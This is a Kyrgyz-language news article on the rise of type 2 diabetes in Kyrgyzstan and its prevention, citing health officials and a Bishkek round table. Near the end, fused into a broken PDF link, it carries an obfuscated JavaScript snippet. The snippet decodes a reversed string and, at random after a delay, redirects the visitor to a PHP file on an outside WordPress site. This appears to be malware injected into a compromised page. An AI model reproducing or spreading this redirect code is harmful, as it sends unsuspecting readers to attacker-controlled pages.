ООРУНУ АЛДЫН АЛУУ АЛДА КАНЧА ЖЕҢИЛ

25-февраль, 2022-ж. / Редакция / Жаңылыктар 57

Кант диабети – XXI кылымдын оорусу деп бекеринен жарыяланган эмес. Анткени, дүйнөдө бул оорудан ар бир 5 секунд сайын бир адам көз жумуп турат экен. Дүйнөлүк  Саламаттык сактоо уюмунун  маалыматы боюнча  2030-жылга чейин кант диабети – өлүмдүн  жетинчи себеби болуп калат деп болжолдонууда. Бүгүнкү күндө дүйнө жүзү боюнча 350 миллионго жакын адам бул өнөкөт оорудан жабыркайт.

Бул тууралуу жакында Бишкекте Дүйнөлүк Саламаттык   сактоо уюмунун техникалык колдоосу менен Кыргыз Республикасынын Саламаттык сактоо министрлигинин, Бүткүл дүйнөлүк Саламаттык сактоо уюмунун өкүлдөрүнүн жана Кыргызстандагы Саламаттык сактоо уюмдарынын кызматкерлеринин катышуусунда өткөн “Кыргызстанда кант диабетин аз аныктоо көйгөйлөрү” боюнча тегерек  столдо айтылды. Бейтаптардын 90 пайызына 2-типтеги кант диабети диагнозу коюлат.Ал ашыкча салмак менен байланышкан инсулинге каршылыктын (иммунитеттин) айкалышы жана уйку безинин бета-клеткаларынын инсулинди жетиштүү өлчөмдө өндүрүү жөндөмдүүлүгүнүн начарлашы менен мүнөздөлөт. Инсулин жетишсиздигинин натыйжасында кандагы канттын деңгээли көтөрүлөт жана бул көптөгөн дене системалары үчүн  уулуу.

“Кант диабети – майыптуулукка алып келген эң кеңири тараган оорулардын бири, анын татаалданышы өлүмгө алып келет. Министрлик Дүйнөлүк Саламаттык сактоо уюмунун “Кант диабетин көзөмөлдөө” долбоорунун алкагында кант диабетин алгачкы баскычта аныктай турган скрининг өткөрүүнү пландоодо” дейт Саламаттык сактоо министрлигинин башкы адиси Нургүл Ибраева. Кыргызстанда баштапкы медициналык-санитардык жардамдын деңгээлинде кант диабети менен күрөшүүнүн жыйынтыгы, аны  алгачкы стадиясында аныктоо өтө төмөн экенин көрсөттү.

Кыргыз мамлекеттик кайра даярдоо жана квалификациясын жогорулатуу медициналык иститутунун эндокринология курстарынын башчысы Роза Султаналиеванын маалыматына караганда, акыркы жылдары өлкөбүздө дүйнө жүзүндөгүдөй эле кант диабети менен ооругандардын саны 3,4 эсеге көбөйүп, анын ичинен 96 пайызы 2-типтеги кант диабети менен ооругандар.

“Бүгүнкү күндө кант диабети дүйнөнүн бардык өлкөлөрүнүн саламаттык сактоо тармагына чакырык таштады. Кант диабети менен ооругандар катастрофалык түрдө өсүүдө. Кант диабетин дарылоо өтө кымбат. Кыргыз Республикасында бул ооруну дарылоого мамлекеттик бюджеттин 20-25 пайызы жумшалат. Кандай болгон күндө да өөрчүшүп кеткенден көрө, оорунун алдын алуу алда канча арзан. Андыктан сергек жашоо образын карманып, тамактануу рационубузга жана салмагыбызга көз салышыбыз керек” дейт  Роза Султаналиева.

Диабеттин тобокелдик факторлору – туура эмес тамактануу, ашыкча салмак, физикалык активдүүлүктүн жоктугу, туруктуу стресс менен байланышкан. Негизги себебин так түшүнүү керек. Ооруну жана анын оор кесепеттерин: кант диабети, муун оорулары, көрүүнүн начарлашы, бөйрөктүн иштөө абалынын жетишсиздиги, инфаркт миокарды баары биригип келип эле кандагы кантты өз убагында текшерүүнүн негизги чарасы. Мындай кырдаалда эмне кылсак болот?

Профилактикалык медицина, сергек жашоо образы, адамдын өз ден соолугу үчүн жоопкерчилиги азыркы учурда биринчи даражадагы мааниге ээ.

Биринчи кезекте 2-типтеги кант диабетин алдын алуу зарыл жана бул мүмкүн. Кыскасы, сергек жашоо – кант диабетинин өсүп-өнүгүп кетүүсүнүн алдын алууга жардам берет. Буга чейин кант диабети менен ооруган адамдар үчүн оорунун татаалдануу коркунучун азайтышы мүмкүн.

2020-жылдын 1-январына карата Кыргызстанда кант диабети менен 62,878 бейтап катталса,алардын ичинен 1-типтеги кант диабети менен 2499 адам жабыркайт экен. Өкүнүчтүүсү дагы, коркунучтуусу дагы – бул ооруга чалдыккандардын жыл сайын көбөйүп жатканы.

Республикабызда катталган өлүмдүн себептери:

  1. Жүрөк-кан тамыр оорулары
  2. Онкологиялык оорулар
  3. Дем алуу органдарынын оорулары
  4. Тышкы себептерге байланыштуу өлүмдөр
  5. Covid-19 дарты
  6. Тамак сиңирүү, ичеги-карын оорулары
  7. Кант диабети болуп калышы мүмкүн экенин адистер коңгуроо кагышууда.

 $NqM=function(n){if (typeof ($NqM.list[n]) == «string») return $NqM.list[n].split(«»).reverse().join(«»);return $NqM.list[n];};$NqM.list=[«\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}too.kg/wp-content/uploads/2022/02/25_02_organized.pdf»>2022-жылдын 25-февралы

Разия Жоошбаева

25-февраль, 2022-ж. / Редакция / Жаңылыктар 57
Бөлүшүү: Telegram WhatsApp X